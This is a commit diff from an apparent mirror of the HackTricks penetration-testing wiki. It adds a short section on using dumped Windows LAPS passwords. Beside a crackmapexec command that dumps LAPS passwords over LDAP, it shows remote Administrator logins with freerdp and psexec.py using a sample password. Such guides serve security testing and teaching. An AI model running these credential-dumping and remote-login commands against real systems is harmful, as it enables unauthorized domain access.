mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
commit
76b23043dd
1 changed files with 9 additions and 0 deletions
|
@ -114,6 +114,15 @@ crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
|
|||
```
|
||||
This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.
|
||||
|
||||
## ** Using LAPS Password **
|
||||
```
|
||||
freerdp /v:192.168.1.1:3389 /u:Administrator
|
||||
Password: 2Z@Ae)7!{9#Cq
|
||||
|
||||
python psexec.py Administrator@web.example.com
|
||||
Password: 2Z@Ae)7!{9#Cq
|
||||
```
|
||||
|
||||
## **LAPS Persistence**
|
||||
|
||||
### **Expiration Date**
|
||||
|
|
Loading…
Reference in a new issue